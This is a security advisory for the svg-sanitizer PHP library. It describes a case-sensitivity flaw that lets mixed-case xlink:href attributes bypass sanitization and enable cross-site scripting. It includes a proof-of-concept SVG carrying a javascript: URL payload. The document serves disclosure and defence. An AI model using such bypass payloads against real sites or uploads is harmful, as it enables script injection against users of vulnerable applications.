Vulnerability GHSA-22wq-q86m-83fh

Medium Risk
MEDIUM RISK
CVSS Score: 6.0
Score Range: 4.0–6.9
Medium severity vulnerabilities (CVSS 4.0–6.9). Important issues that meaningfully reduce security confidence.
1 year ago
August 12, 2025 at 08:20 PM UTC
svg-sanitizer Bypasses Attribute Sanitization
0.1.0 - 0.5.3 and 0.5.3.1 - 0.21.0
0.1.0 - 0.5.3 and 0.5.3.1 - 0.21.0

Summary

svg-sanitizer Bypasses Attribute Sanitization

Details

Problem

The sanitization logic at https://github.com/darylldoyle/svg-sanitizer/blob/0.21.0/src/Sanitizer.php#L454-L481 only searches for lower-case attribute names (e.g. xlink:href instead of xlink:HrEf), which allows to by-pass the isHrefSafeValue check. As a result this allows cross-site scripting or linking to external domains.

Proof-of-concept

provided by azizk

<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100">
  <a xlink:hReF="javascript:alert(document.domain)">
    <rect width="100" height="50" fill="red"></rect>
    <text x="50" y="30" text-anchor="middle" fill="white">Click me</text>
  </a>
</svg>

Credits

The mentioned findings and proof-of-concept example were reported to the TYPO3 Security Team by the external security researcher azizk <[email protected]>.

Impacted packages

Timeline

Published
1 year ago
August 12, 2025 at 08:20 PM UTC
Fixed (0.22.0)
1 year ago
August 12, 2025 at 10:13 AM UTC
Last Modified
1 year ago
August 12, 2025 at 08:42 PM UTC